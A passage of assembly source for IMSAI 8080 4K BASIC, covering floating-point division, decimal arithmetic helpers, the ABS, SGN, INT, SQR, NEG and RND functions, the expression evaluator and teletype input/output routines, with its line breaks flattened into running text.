;DECR CTR JP NZ,FMUX5 ;LOOP JP C,FADX1 ;BRIF CARRY INTO 7 DIGITS JP FNORM ;GO NORMALIZE *HEADING IMSAI 8080 4K BASIC FDIV EQU $ ; ; ;FLOATING POINT DIVIDE THE NUMBER AT (HL) INTO FACC ; ; CALL FTEST ;TEST IF FACC ZERO RET Z ;RETURN IF ZERO INC HL ;POINT 1ST DIGIT OF DIVISOR LD A,(HL) ;LOAD IT DEC HL ;POINT BACK OR A ;TEST IF ZERO JP Z,OVERR ;DIVISION BY ZERO = ERROR LD A,(HL) ;LOAD EXPONENT OF DIVISOR CALL FEXP ;GO GET EXPON LD B,A ;SAVE IT LD DE,FACC ;POINT EXPONENT OF DIVIDEND LD A,(DE) ;LOAD IT CALL FEXP ;GO GET EXPON SUB B ;SUBTRACT THE TWO EXPONENTS CALL FOVUN ;GO SAE IF OVERFLOW/UNDERFLOW AND 7FH ;TRUNCATE TO 7 BITS LD B,A ;SAVE IT LD A,(DE) ;GET EXPONENT XOR (HL) ;IF SIGNS ARE EQUAL, RESULT IS P AND 80H ;MASK OFF UNUSED BITS OR B ;CREATE SIGN OF QUOTIENT LD (DE),A ;PUT TO FACC PUSH HL ;SAVE ADDR INC DE ;POINT MSD OF DIVIDEND LD HL,FTEMP ;POINT TEMPORARY STORAGE LD (HL),0 ;CLEAR HIGH ORDER POSITION INC HL ;POINT NEXT LD B,3 ;LOOP CTR FDIV3 LD A,(DE) ;GET BYTE FROM FACC LD (HL),A ;PUT TO FTEMP XOR A ;CLEAR A LD (DE),A ;ZERO FACC INC HL ;POINT NEXT INC DE ;DITTO DEC B ;DECR CTR JP NZ,FDIV3 ;LOOP LD (DIVSW),A ;RESET SWITCH LD (HL),A ;CLEAR HIGH PAIR OF DIVISOR POP DE ;GET ADDR LD B,3 ;LOOP CTR INC DE ;POINT MSD OF DIVISOR INC HL ;AND OF DIVIDEND CALL COPYD ;GO MOVE IT LD C,6 ;OUTER LOOP CTR FDIV5 LD B,-1 ;INIT CTR FDIV7 LD DE,FTEMP+3 ;POINT DIVIDEND LD HL,FTEMP+7 ;POINT DIVISOR PUSH BC ;SAVE BC LD B,4 ;LOOP CTR CALL FSUBT ;GO SUBTRACT THE TWO POP BC ;GET COUNTERS INC B ;COUNT ONE MORE JP NC,FDIV7 ;LOOP IF NOT TOO FAR LD A,(DIVSW) ;GET SWITCH OR A ;TEST IT JP NZ,FDIV1 ;BRIF SET PUSH BC ;SAVE BC LD C,3 ;THREE BYTE LOOP LD HL,FACC+3 ;POINT LSD OF QUOTIENT FDIX1 LD A,(HL) ;GET DIGIT PAIR LD D,A ;SAVE IT RST RST4 ;SHIFT LEFT OR B ;MERGE WITH PREV LD (HL),A ;PUT BACK LD A,D ;GET SAVED PAIR CALL RIGHT ;SHIFT RIGHT LD B,A ;SAVE IT DEC HL ;POINT NEXT DEC C ;DECR CTR JP NZ,FDIX1 ;LOOP POP BC ;GET CTRS LD DE,FTEMP+3 ;POINT PREV LD HL,FTEMP+7 ;POINT DIVISOR LD B,4 ;LOOP CTR CALL FADDT ;GO ADD LD B,4 ;INNER CTR LD HL,FTEMP+3 ;POINT LSD OF DIVIDEND LD D,0 ;SAVE DIGIT CALL FSHFX ;GO SHIFT DEC C ;DECR OUTER CTR JP NZ,FDIV5 ;LOOP IF NOT ZERO LD A,(FACC+1) ;GET MSD OF QUOTIENT AND 0F0H ;ISOLATE LEFT HALF JP NZ,FDIX2 ;BRIF NORMALIZED LD A,(FACC) ;GET EXPON & SIGN LD B,A ;SAVE AND 80H ;ISOLATE SIGN LD C,A ;SAVE LD A,B ;GET EXPON & SIGN CALL FEXP ;GO GET EXPONENT DEC A ;SUBTRACT ONE AND 7FH ;TRUNCATE 8TH BIT OR C ;MERGE SIGN BIT LD (FACC),A ;PUT DOWN LD C,1 ;NEW LOOP CTR JP FDIV5 ;ONE MORE TIME FDIX2 LD A,1 ;GET A ONE LD (DIVSW),A ;SET SWITCH JP FDIV5 ;GO ONE MORE DIGIT FDIV1 LD A,B ;GET THE EXTRA QUOTIENT DIGIT CP 5 ;COMPARE TO 5 JP C,FNORM ;BRIF LESS JP FROUN ;ELSE, GO ROUND IT FOVUN EQU $ ;TEST IF EXPONENT OVERFLOW/UNDER JP P,FOVUX ;BRIF POSITIVE CP 0C1H ;TEST FOR UNDERFLOW RET NC ;RETIFNOT UNDERFLOW JP OVERR ;ELSE, ERROR FOVUX CP 40H ;TEST IF OVERFLOW RET C ;RETIF LESS JP OVERR ;ELSE, OVER/UNDEFLOW *HEADING IMSAI 8080 4K BASIC FTEST EQU $ ; ;TEST THE SIGN OF THE NUMBER IN THE FACC ;RETURN WITH S & Z ZET TO SIGN ; LD A,(FACC+1) ;GET MSD OR A ;TEST IT RET Z ;RETURN IF ZERO LD A,(FACC) ;GET SIGN & EXPON BYTE OR 7FH ;TEST SIGN BIT ONLY LD A,(FACC) ;RE-LOAD EXPON BYTE RET ;THEN RETURN *HEADING IMSAI 8080 4K BASIC FEXP EQU $ ; ;EXPAND EXPONENT INTO 8 BINARY BITS ; RLA ;DROP MANTISSA SIGN OR A ;TEST SIGN OF EXPON JP P,FEXP1 ;BRIF POSITIVE SCF ;ELSE, TURN ON CY FEXP1 RRA ;SHIFT BACK RET ;RETURN *HEADING IMSAI 8080 4K BASIC FSUBT EQU $ ; ;DECIMAL SUBTRACT THE TWO 6 DIGIT NUMBERS (DE) & (HL) ; XOR A ;CLEAR STATUS FSUX1 PUSH BC ;SAVE CTR LD A,(DE) ;GET ACC DIGIT PAIR SBC A,(HL) ;SUBTRACT PAIR FROM SUBTRAHEND PUSH AF ;SAVE A, FLAGS POP BC ;GET A, FLAGS IN BC LD A,C ;GET FLAGS AND 10H ;TEST AC STATUS JP NZ,FSUX2 ;BRIF SET LD A,B ;GET DIFFERENCE SUB 06H ;ADJUST RIGHT SIDE LD B,A ;SAVE FSUX2 LD A,C ;GET FLAGS RRA ;TEST CY JP NC,FSUX3 ;BRIF NOT SET LD A,B ;GET DIFF SUB 60H ;ADJUST LEFT SIDE LD B,A ;SAVE FSUX3 PUSH BC ;RESAVE A, FLAGS POP AF ;RE-LOAD DIFFERENCE, FLAGS LD (DE),A ;PUT TO ACC POP BC ;GET BC DEC DE ;POINT PRIOR DEC HL ;DITTO DEC B ;DECR CTR JP NZ,FSUX1 ;LOOP RET ;RETURN *HEADING IMSAI 8080 4K BASIC FADDT EQU $ ; ;ADD TWO DECIMAL NUMBERS (DE) & (HL) ; XOR A ;CLEAR STATUS FADXT LD A,(DE) ;GET PAIR ADC A,(HL) ;ADD OTHER PAIR DAA ;ADJUST LD (DE),A ;PUT DOWN DEC DE ;POINT NEXT DEC HL ;DITTO DEC B ;DECR LOOP CTR JP NZ,FADXT ;LOOP RET ;RETURN *HEADING IMSAI 8080 4K BASIC FSHFT EQU $ ; ;INCREMENTING SHIFT RIGHT ; LD A,(HL) ;GET A BYTE LD E,A ;SAVE IT CALL RIGHT ;SHIFT RIGHT OR D ;PLUS PREV LD (HL),A ;STORE LD A,E ;GET PREV RST RST4 ;SHIFT LEFT LD D,A ;SAVE FOR NEXT INC HL ;POINT NEXT DEC B ;DECR CTR JP NZ,FSHFT ;LOOP RET ;RETURN *HEADING IMSAI 8080 4K BASIC FSHFX EQU $ ; ;DECREMENTING SHIFT RIGHT ; LD A,(HL) ;GET A BYTE CALL RIGHT ;SHIFT RIGHT LD E,A ;SAVE IT LD A,(HL) ;RELOAD RST RST4 ;SHIFT LEFT OR D ;MERGE LD (HL),A ;REPLACE LD D,E ;UPDATE SAVED DEC HL ;POINT NEXT DEC B ;DECR CTR JP NZ,FSHFX ;LOOP RET ;RETURN ; ; *HEADING IMSAI 8080 4K BASIC ABS EQU $ ; ; ;RETURN THE ABSOLUTE VALUE OF THE FLOATING ACCUMULATOR ; ; LD A,(FACC) ;GET EXPONENT AND 7FH ;STRIP NEGATIVE SIGN LD (FACC),A ;REPLACE RET ;RETURN *HEADING IMSAI 8080 4K BASIC SGN EQU $ ; ; ;RETURNS THE SIGN OF THE FLOATING ACCUMULATOR ;THAT IS: ; 1 IF FACC > 0 ; 0 IF FACC = 0 ;-1 IF FACC < 0 ; CALL FTEST ;GO TEST FACC RET Z ;RETURN IF ZERO AND 80H ;ISOLATE IT PUSH AF ;SAVE IT LD HL,ONE ;GET ADDRESS OF CONSTANT 1 RST RST5 ;GO LOAD IT POP AF ;RESTORE SIGN LD (FACC),A ;SET THE SIGN & EXPONENT RET ;RETURN *HEADING IMSAI 8080 4K BASIC INT EQU $ ; ; ;RETURNS THE GREATEST INTEGER NOT LARGER THAN THE ABSOLUTE VALUE ; ; LD HL,FACC ;POINT FLOAT ACC LD A,(HL) ;GET EXPONENT AND 40H ;GET SIGN OF CHARACTERISTIC JP Z,INT2 ;BRIF GE ZERO LD B,4 ;FOUR BYTE LOOP JP ZEROM ;ZERO FACC AND RETURN INT2 LD A,(HL) ;GET EXPONENT AND 3FH ;ISOLATE CHARACTERISTIC CP 5 ;TEST FOR FIVE OR LARGER RET P ;RETURN IF >= 5 LD B,A ;SAVE EXPONENT LD A,5 ;GET CONSTANT SUB B ;MINUS EXPONENT = LOOP CTR LD B,A ;SAVE IT LD HL,FACC+3 ;POINT LSD INT3 LD A,(HL) ;LOAD A BYTE AND 0F0H ;DROP RIGHT HALF LD (HL),A ;PUT BACK DEC B ;DECR CTR RET Z ;RETURN IF ZERO LD (HL),0 ;ZERO LEFT HALF DEC HL ;POINT NEXT DEC B ;DECR CTR JP NZ,INT3 ;LOOP RET ;CONTINUE EVALUATION *HEADING IMSAI 8080 4K BASIC SQR EQU $ ; ; ;COMPUTE THE SQUARE ROOT OF THE FACC ;USES NEWTON'S THIRD ORDER ITERATION ; ; CALL FTEST ;GO GET SIGN OF FACC JP M,OVERR ;BRIF SQUARE ROOT OF NEGATIVE RET Z ;RETURN IF SQUARE ROOT OF ZERO LD HL,ORIGS ;POINT TO TEMP AREA RST RST6 ;SAVE ORIGINAL NUMBER LD HL,ONE ;POINT CONSTANT CALL FADD ;ADD ONE LD HL,TWO ;POINT CONSTANT CALL FDIV ;DIVIDE BY TWO ; ;FIRST APPROXIMATION = (X+1)/2 ; SQRLP LD HL,TSTSQ ;GET ADDR OF TEST RST RST6 ;SAVE IT LD HL,TSTSQ ;POINT PREV ITERATION CALL FMUL ;SQUARE IT LD HL,TST2S ;POINT SAVE AREA RST RST6 ;SAVE IT LD HL,ORIGS ;GET ORIGINAL NUMBER CALL FSUB ;SUBTRACT FROM PREV**2 CALL FTEST ;GET SIGN OF DIFFERENCE JP M,SQRGO ;BRIF PREV**2 < ORIGINAL JP Z,SQRGO ;BRIF PREV**2 = ORIGINAL LD HL,TST2S ;GET PREV**2 RST RST5 ;GO LOAD IT LD HL,THREE ;POINT CONSTANT OF 3 CALL FMUL ;MULTIPLY WITH PREV**2 LD HL,ORIGS ;GET ORIGINAL NUMBER CALL FADD ;GO ADD LD HL,SQRX ;POINT TEMP AREA RST RST6 ;SAVE DIVISOR LD HL,THREE ;POINT CONSTANT OF 3 RST RST5 ;GO LOAD IT LD HL,ORIGS ;GET ORIGINAL NUMBER CALL FMUL ;MULTIPLY BY THREE LD HL,TST2S ;GET SQUARE OF PREV ITERATION CALL FADD ;GO ADD IT LD HL,TSTSQ ;GET PREV ITERATION CALL FMUL ;GO MULTIPLY LD HL,SQRX ;POINT DIVISOR CALL FDIV ;GO DIVIDE LD HL,SQRX ;POINT TEMP AREA RST RST6 ;SAVE IT LD HL,TSTSQ ;GET PREV ESTIMATE CALL FSUB ;GO COMPARE THEM LD HL,SQRX ;POINT THIS ANSWER CALL FTEST ;GET SIGN OF DIFFERENCE JP Z,SQRGX ;BRIF SAME GUESS RST RST5 ;ELSE, LOAD THIS GUESS ;NEXT ITERATION = PREV*(3*X+PREV**2)/(3*PREV**2+X) JP SQRLP ;LOOP SQRGO LD HL,TSTSQ ;POINT SQUARE ROOT SQRGX RST RST5 ;GO LOAD ACC RET ;THEN RETURN *HEADING IMSAI 8080 4K BASIC NEG EQU $ ; ; ;REVERSES THE SIGN OF THE FLOATING ACC ; ; CALL FTEST ;GET SIGN OF FACC RET Z ;RETURN IF ZERO XOR 80H ;REVERSE SIGN LD (FACC),A ;RESTORE EXPONENT RET ;CONTINUE EVALUATION *HEADING IMSAI 8080 4K BASIC RND EQU $ ; ; ;PSEUDO RANDOM NUMBER GENERATOR ; ; LD HL,RNDNU ;POINT PREV RND RST RST5 ;LOAD TO FACC LD HL,RNDX ;POINT MULTIPLIER CALL FMUL ;GO MULTIPLY LD HL,FACC ;POINT RESULT LD (HL),7FH ;DEFAULT . XXXXXX INC HL ;POINT MSD LD B,(HL) ;LOAD IT INC HL ;POINT MSD+2 LD C,(HL) ;LOAD IT LD (HL),B ;SWAP BYTES DEC HL ;POINT BACK MSD LD (HL),C ;MOV MSD+2 CALL FNORM ;GO NORMALIZE LD HL,RNDNU ;POINT NEW RND NUMBER RST RST6 ;GO STORE IT RET ;RETURN *HEADING IMSAI 8080 4K BASIC EXPR EQU $ ; ; ;EVALUATE EXPRESSION ROUTINE ;LEAVE RESULT IN FACC ;RETURN WHEN EXPRESSION ENDS (TYPICALLY AT END OF LINE) ; ; XOR A ;CLEAR REG A LD (PARCT),A ;SET PAREN CTR LD (SPCTR),A ;SET STACK CTR EX DE,HL ;SAVE HL IN DE LD HL,(PROGE) ;POINT END OF PROGRAM AREA LD (EXPRS),HL ;SAVE IT EX DE,HL ;RESTORE HL ; LOOKD EQU $ ;LOOK FOR CONSTANT, VARIABLE, OR CALL NUMER ;GO TEST IF NUMERIC JP NZ,LDALP ;BRIF NOT LDNUM CALL FIN ;GO CONVERT NUMERIC (PUT TO FACC LDF LD B,H ;COPY HL TO BC LD C,L ;SAME LD HL,(EXPRS) ;GET ADDR OF EXPR AREA CALL GTEMP ;GO STORE THE FACC IN TEMP AREA LD (EXPRS),HL ;SAVE UPDATED ADDRESS LD H,B ;RESTORE H LD L,C ;RESTORE L JP LOOKO ;GO GET AN OPERATION CODE LDALP CP '.' ;SEE IF LEADING DECIMAL POINT JP Z,LDNUM ;BRIF IS CALL ALPHA ;GO SEE IF ALPHA JP NZ,LDDTN ;BRIF NOT LD B,(HL) ;SAVE 1ST CHAR INC HL ;POINT NEXT LD C,' ' ;DEFAULT FOR 1 CHAR VAR CALL NUMER ;GO SEE IF 2ND IS NUMERIC JP NZ,LDFN ;BRIF NOT INC HL ;POINT NEXT LD C,A ;SAVE THE CHAR LDVR1 PUSH HL ;SAVE HL LD D,B ;COPY BC LD E,C ;TO DE CALL SEARC ;GO GET VAR ADDR IN DE LD HL,(EXPRS) ;GET EXPR ADDR CALL SADR ;GO STORE ADDRESS LD (EXPRS),HL ;SAVE ADDRESS POP HL ;RESTORE HL JP LOOKO ;GO LOOK FOR OPCODE LDFN CALL ALPHA ;GO SEE IF FUNCTION JP NZ,LDVR1 ;BRIF IT'S NOT LDFN1 DEC HL ;POINT BACK TO 1ST LD A,(HL) ;GET THAT CHAR CP ' ' ;TEST IF SPACE JP Z,LDFN1 ;LOOP IF IS PUSH HL ;SAVE HL LD DE,RNDLI ;POINT LITERAL RST RST2 ;GO COMPARE JP Z,LDRND ;BRIF RND POP HL ;GET HL PUSH HL ;RESAVE IT LD DE,SQRLI ;POINT LITERAL RST RST2 ;GO COMPARE LD BC,SQR ;GET ADDR OF ROUTINE JP Z,LDFNC ;BRIF IS POP HL ;GET HL PUSH HL ;RESAVE LD DE,INTLI ;POINT RST RST2 ;GO COMPARE LD BC,INT ;ROUTINE ADDR JP Z,LDFNC ;BRIF EQUAL POP HL ;GET HL PUSH HL ;SAVE IT LD DE,ABSLI ;LITERAL RST RST2 ;COMPARE LD BC,ABS ;ROUTINE JP Z,LDFNC ;BRIF EQUAL POP HL ;GET HL PUSH HL ;SAVE IT LD DE,SGNLI ;LITERAL RST RST2 ;GO COMPARE LD BC,SGN ;ROUTINE JP Z,LDFNC ;BRIF EQUAL POP HL ;GET HL LD B,(HL) ;GET 1ST CHAR LD C,' ' ;SPACE 2ND CHAR INC HL ;POINT NEXT JP LDVR1 ;BRIF VARIABLE LDRND PUSH HL ;SAVE HL CALL RND ;GO GET RANDOM NUMBER POP HL ;RESTORE HL POP DE ;RESTORE STACK POINTER JP LDF ;ACT AS IF CONSTANT LDFNC POP DE ;POP THE STACK EX DE,HL ;FLIP/FLOP LD HL,(EXPRS) ;GET ADDR INC HL ;POINT NEXT LD (HL),B ;HIGH ADDR INC HL ;POINT NEXT LD (HL),C ;LOW ADDR INC HL ;POINT NEXT LD (HL),1 ;CODE LD (EXPRS),HL ;SAVE ADDR EX DE,HL ;RESTORE HL JP LOOKD ;NEXT MUST BE DATA TOO LDDTN CP '-' ;TEST IF UNARY MINUS JP NZ,LDDTP ;BRIF NOT LD BC,NEG ;SET UP CALL INC HL ;POINT NEXT PUSH HL ;SAVE HL JP LDFNC ;GO AS IF FUNCTION LDDTP CP '(' ;TEST IF OPEN PAREN JP NZ,SNERR ;BRIF NOT CONSTANT, FUNCTION, OR LD A,(PARCT) ;GET OPEN COUNT INC A ;ADD ONE LD (PARCT),A ;STORE IT EX DE,HL ;SAVE HL LD HL,(EXPRS) ;GET ADDR INC HL ;POINT NEXT LD (HL),'(' ;PUT CODE LD (EXPRS),HL ;SAVE ADDR EX DE,HL ;RESTORE HL INC HL ;POINT NEXT JP LOOKD ;NEXT HAS TO BE DATA TOO LOOKO RST RST1 ;SKIP BLANKS CP '+' ;TEST IF PLUS JP Z,OP1 ;BRIF IS CP '-' ;TEST IF MINUS JP Z,OP1 ;BRIF IS CP '*' ;TEST IF MULTIPLY JP Z,OP2 ;BRIF IS CP '/' ;TEST IF DIVIDE JP Z,OP2 ;BRIF IS CP ')' ;TEST IF CLOSE PAREN JP Z,OP3 ;BRIF IS ;ELSE MUST BE END OF EXPRESSION LD A,(PARCT) ;GET OPEN PAREN COUNT OR A ;TEST IT JP NZ,SNERR ;BRIF # OF ('S NOT = # OF )'S LD (ADDR3),HL ;SAVE ADDR OF STMT JP EVAL ;GO EVALUATE OP1 PUSH HL ;SAVE HL LD C,(HL) ;SAVE OPERATION LD B,0 ;INIT CTR LD HL,(EXPRS) ;GET END POINTER OP1L1 INC B ;COUNT ONE MORE LD A,(HL) ;LOAD TYPE CODE CP '(' ;TEST IF OPEN PAREN JP Z,INSOP ;BRIF IS OR A ;TEST IF END BUFF JP Z,INSOP ;BRIF IS OR A ;TEST IF DATA JP Z,OP1L2 ;BRIF IS CP 1 ;TEST IF FUNCT JP NZ,OP1L3 ;BRIF NOT EQUAL OP1L2 DEC HL ;POINT NEXT DEC HL ;DITTO INC B ;COUNT INC B ;TWO BYTES OP1L3 DEC HL ;POINT NEXT OPCODE JP OP1L1 ;LOOP INSOP INC HL ;POINT FIRST CHAR LD A,(HL) ;PICK UP OLD VALUE LD (HL),C ;PUT PREV LD C,A ;ROTATE DEC B ;DECR COUNT JP NZ,INSOP ;LOOP LD (EXPRS),HL ;SAVE ADDR POP HL ;GET STMT POINTER INC HL ;POINT NEXT JP LOOKD ;NEXT IS DATA OP2 PUSH HL ;SAV HL LD C,(HL) ;SAVE OPCODE LD B,1 ;INIT CTR LD HL,(EXPRS) ;GET CURRENT END OP2A RST RST7 ;GO BUMP HL DEFB -3 ;BY NEG THREE INC B ;ADD INC B ;THREE INC B ;TO B LD A,(HL) ;GET TYPE CODE CP 1 ;SEE IF FUNCTION JP Z,OP2A ;BRIF IS JP INSOP ;GO INSERT OPCODE OP3 LD A,(PARCT) ;GET OPEN PAREN COUNT DEC A ;SUBTRACT ONE LD (PARCT),A ;SAVE IT JP M,SNERR ;BRIF TOO MANY )'S INC HL ;POINT NEXT SOURCE LD (ADDR3),HL ;SAVE ADDR EVAL LD HL,(EXPRS) ;GET END OF EXPR EV0 LD BC,0 ;INIT BC TO ZERO EV1 INC B ;COUNT EACH BYTE LD A,(HL) ;GET CODE IN REG A DEC HL ;POINT NEXT CP 0E3H ;TEST IT JP NZ,EV2 ;BRIF NOT DATA DEC HL ;POINT NEXT DEC HL ;DITTO INC B ;BUMP CTR INC B ;BY TWO INC C ;COUNT THE TERM JP EV1 ;LOOP EV2 CP 1 ;TEST IF FUNCTION JP NZ,EV5 ;BRIF NOT INC HL ;RESET TO TYPE CODE INC HL ;POINT BACK PREV DATA LD D,(HL) ;MOVE HIGH TO D INC HL ;POINT ONE MORE LD E,(HL) ;MOV LOW PUSH BC ;SAVE CTRS PUSH HL ;SAVE LOCATION EX DE,HL ;FLIP/FLOP RST RST5 ;GO LOAD THE VARIABLE POP HL ;RESTORE LOCATION RST RST7 ;GO BUMP HL DEFB -3 LD E,(HL) ;LOW BYTE DEC HL ;POINT BACK LD D,(HL) ;HIGH BYTE PUSH HL ;SAVE LOCATION LD HL,EV3 ;GET RETURN ADDRESS PUSH HL ;SAVE ON STACK EX DE,HL ;PUT TO HL JP (HL) ;GO EXECUTE THE FUNCTION EV3 EQU $ ;FUNCTIONS RETURN HERE POP DE ;GET LOCATION POP BC ;GET COUNTERS LD HL,0 ;LOAD ZERO TO HL PUSH HL ;GET BLOCK OF PUSH HL ;4 BYTES LD A,(SPCTR) ;GET TEMP CTR INC A ;COUNT ONE LD (SPCTR),A ;SAVE IT ADD HL,SP ;GET STACK ADDR PUSH BC ;SAVE CTRS PUSH DE ;SAVE LOCATION PUSH HL ;SAVE ADDR RST RST6 ;GO STORE THE VARIABLE POP DE ;RESTORE ADDR POP HL ;RESTORE LOCATION POP BC ;RESTORE COUNTERS LD (HL),D ;PUT HIGH ADDR BYTE INC HL ;POINT NEXT LD (HL),E ;PUT LOW ADDR BYTE INC HL ;POINT NEXT LD (HL),0E3H ;SET CODE = DATA LD D,H ;COPY LD E,L ;HL TO DE DEC B ;SUB 1 FROM BYTE COUNT INC DE ;POINT INC DE ;TO INC DE ;CORRECT CALL SQUIS ;GO COMPRESS STACK LD HL,(EXPRS) ;GET ADDR RST RST7 ;GO DECR HL DEFB -3 ;BY THREE LD (EXPRS),HL ;SAVE UPDATED ADDR JP EVAL ;START AT BEGINNING EV5 CP '(' ;TEST IF OPEN PAREN JP NZ,EV6 ;BRIF NOT LD A,C ;GET TERM CT CP 1 ;TEST IF ONE JP NZ,STERR ;ERROR IF ONE TERM NOT REMAIN LD D,H ;COPY HL LD E,L ;TO DE INC DE ;POINT SENDING DEC B ;SUBT ONE FROM COUNT CALL SQUIS ;GO COMPRESS IT LD HL,(EXPRS) ;GET POINTER DEC HL ;LESS ONE LD (EXPRS),HL ;UPDATE IT LD HL,(ADDR3) ;RESTORE STMT POINTERS JP LOOKO ;CONTINUE EV6 OR A ;TEST IF END OF EXPRESSION JP NZ,EV9 ;BRIF NOT LD A,C ;GET TERM COUNT CP 1 ;TEST IF ONE JP NZ,STERR ;ERROR IF NOT ONE INC HL ;POINT HIGH ADDR INC HL ;SAME LD D,(HL) ;HIGH TO D INC HL ;POINT LOW LD E,(HL) ;LOW TO E EX DE,HL ;PUT DATA ADDRESS IN HL RST RST5 ;GO LOAD IT LD HL,(ADDR3) ;RESTORE STMT POINTER LD A,(SPCTR) ;GET STACK WORD (4BYTE) COUNTER OR A ;TEST IT RET Z ;RETURN IF ZERO EV7 POP DE ;RETURN 2 BYTES POP DE ;RETURN 2 MORE DEC A ;DECR CTR JP NZ,EV7 ;LOOP RET ;RETURN TO STMT PROCESSOR EV9 CP '+' ;TEST IF PLUS LD DE,FADDJ ;ADDR JP Z,EV10 ;BRIF IS CP '-' ;TEST IF MINUS LD DE,FSUBJ ;ADDR JP Z,EV10 ;BRIF IS CP '*' ;TEST IF MUL LD DE,FMULJ ;ADDR JP Z,EV10 ;BRIF IS CP '/' ;TEST IF DIV LD DE,FDIVJ ;ADDR JP NZ,STERR ;ERROR IF NOT EV10 INC HL ;POINT TO INC HL ;1ST DATA PUSH BC ;SAVE CTRS PUSH DE ;SAVE ROUTINE ADDR LD D,(HL) ;HIGH TO D INC HL ;POINT NEXT LD E,(HL) ;LOW TO E PUSH HL ;SAVE POINTER EX DE,HL ;ADDR TO HL RST RST5 ;GO LOAD IT POP HL ;RESTORE HL INC HL ;POINT 2ND DATA INC HL ;SAME LD D,(HL) ;HIGH TO D INC HL ;POINT NEXT LD E,(HL) ;LOW TO E EX (SP),HL ;POP ADDR FROM STACK, PUSH HL ON JP (HL) ;JUMP TO ROUTINE FADDJ EX DE,HL ;GET HL CALL FADD ;GO ADD JP EV11 ;CONTINUE FSUBJ EX DE,HL ;GET HL CALL FSUB ;GO SUBTRACT JP EV11 ;CONTINUE FMULJ EX DE,HL ;GET HL CALL FMUL ;GO MULTIPLY JP EV11 ;CONTINUE FDIVJ EX DE,HL ;GET HL CALL FDIV ;GO DIVIDE EV11 POP HL ;GET HL POP BC ;GET CTRS RST RST7 ;GO DECR HL DEFB -6 CALL GTEMP ;GO SAVE FACC LD D,H ;COPY HL LD E,L ;TO DE INC DE ;POSITION INC DE ;TO INC DE ;FOUR INC DE ;BYTES OFFSET LD A,B ;GET CTR SUB 3 ;MINUS THREE LD B,A ;SAVE CALL SQUIS ;GO COMPRESS LD HL,(EXPRS) ;GET ADDR RST RST7 ;GO DECR HL DEFB -4 ;BY FOUR LD (EXPRS),HL ;RESTORE JP EVAL ;CONTINUE ; ; *HEADING IMSAI 8080 4K BASIC TERMI EQU $ ; ;READ A LINE FROM THE TTY ;FIRST PROMPT WITH THE CHAR IN THE A REG ;TERMINATE THE LINE WITH A X'00' ;IGNORE EMPTY LINES ;CONTROL C WILL CANCEL THE LINE ;RUBOUT WILL DELETE THE LAST CHAR INPUT ; ; LD (PROMP),A ;SAVE THE PROMPT CHAR LD A,0FFH ;GET BEGIN MARKER LD (IOBUF-1),A ;PUT IT REIN LD HL,IOBUF ;POINT TO INPUT BUFFER LD A,(PROMP) ;GET THE PROMPT AGAIN OR A ;TEST IT JP Z,TREAD ;BRIF NULL CALL TESTO ;GO WRITE IT LD A,' ' ;GET A SPACE CALL TESTO ;WRITE SPACE TREAD EQU $ CALL TESTI ;GO WAIT FOR READY CALL GETCH ;GO GET THE CHARACTER LD (HL),A ;PUT IN BUFFER LD A,(HL) ;RELOAD THE CHAR CP 0AH ;TEST IF LINE FEED JP Z,TREAD ;IGNORE IF IT IS CALL TESTO ;ECHO THE CHARACTER CP 0DH ;TEST IF CR JP NZ,NOTCR ;BRIF NOT CALL CRLF ;GO WRITE CRLF CR1 LD (HL),0 ;MARK END WITH ALL HIGH DEC HL ;POINT PRIOR LD A,(HL) ;LOAD IT CP ' ' ;TEST IF SPACE JP Z,CR1 ;BRIF SPACE CP 0FFH ;TEST IF AT BEGINNING JP Z,REIN ;BRIF IS (NULL LINE) LD HL,IOBUF ;POINT TO START RET ;ELSE, RETURN TESTI EQU $ ; IN A,(TTY-1) ;GET TERM STATUS ; AND 40H ;MASK FOR RXRDY IN A,(TTY+1) ;**UM** AND 2 ;**UM** JP Z,TESTI ;LOOP TILL READY RET ;RETURN TESTO EQU $ PUSH AF ;SAVE CHAR TO OUTPUT LD A,(OUTSW) ;GET OUTPUT SWITCH OR A ;TEST IF OFF JP NZ,TOUT2 ;BRIF NOT ;TOUT1 IN A,(TTY-1) ;GET STATUS ; RLA ;SHIFT LEFT (TEST TXRDY) TOUT1 IN A,(TTY+1) ;**UM** RRA ;**UM** JP NC,TOUT1 ;LOOP TILL READY POP AF ;GET CHAR TO OUTPUT OUT (TTY),A ;WRITE IT RET ;RETURN TOUT2 POP AF ;RESTORE CHAR RET ;RETURN CRLF XOR A ;CLEAR REG A LD (COLUM),A ;RESET COLUM POINTER LD A,0DH ;GET CR CALL TESTO ;WRITE IT LD A,0AH ;LF CALL TESTO ;WRITE IT PUSH BC ;SAVE BC LD B,2 ;DELAY COUNT DELAY LD A,0FFH ;GET RUBOUT CALL TESTO ;WRITE IT DEC B ;DECR LOOP CTR JP NZ,DELAY ;LOOP POP BC ;RESTORE BC RET ;RETURN NOTCR CP 7FH ;TEST IF RUBOUT JP NZ,NOTBS ;BRIF NOT DEC HL ;POINT PRIOR LD A,(HL) ;LOAD PREV CHAR CP 0FFH ;TEST IF AT BEGIN JP Z,NOTBS ;BRIF IS LD A,':' ;BACKSLASH CALL TESTO ;WRITE IT LD A,(HL) ;LOAD THE CHAR CALL TESTO ;WRITE IT DEC HL ;POINT PRIOR LD A,':' ;BACKSLASH CALL TESTO ;WRITE IT NOTBS INC HL ;POINT NEXT BUFFER POSIT JP TREAD ;LOOP FOR NEXT ; ; TERMO EQU $ ; ;TTY PRINT ROUTINE ; ;OUTPUT STRING OF CHARS STARTING AT IOBUFF THRU END (00 OR ;FOLLOWING IMBEDDED CHARACTERS ARE INTERPRETED AS CONTROLS: ;X'00' END OF BUFFER, TYPE CR/LF AND RETURN ;X'FE' END OF BUFFER, RETURN (NO CR/LF) ;X'FD' TYPE CR/LF, CONTINUE ; ; LD HL,IOBUF ;GET ADDR OF BUFFER OUT1 LD A,(HL) ;LOAD A BYTE CP 0FEH ;SEE IF END OF LINE (NO CR/LF) RET Z ;RETURN IF EQUAL CP 0FDH ;SEE IF EMBEDDED CR/LF JP NZ,OUT2 ;BRIF NOT CALL CRLF ;LINE FEED JP OUT4 ;CONTINUE OUT2 OR A ;TEST IF END OF OUTPUT JP Z,CRLF ;BRIF IS LD A,(HL) ;LOAD THE BYTE CALL TESTO ;TYPE IT LD A,(COLUM) ;GET COLUM POINTER INC A ;ADD ONE LD (COLUM),A ;RESTORE IT OUT4 INC HL ;POINT NEXT JP OUT1 ;LOOP ; ; ; LINEO EQU $ ; ;UNPACK LINE NUMBER FROM (HL) TO (DE) ; ; CALL LOUT ;GO FORMAT 2 BYTES LOUT EQU $ LD A,(HL) ;GET BYTE CALL RIGHT 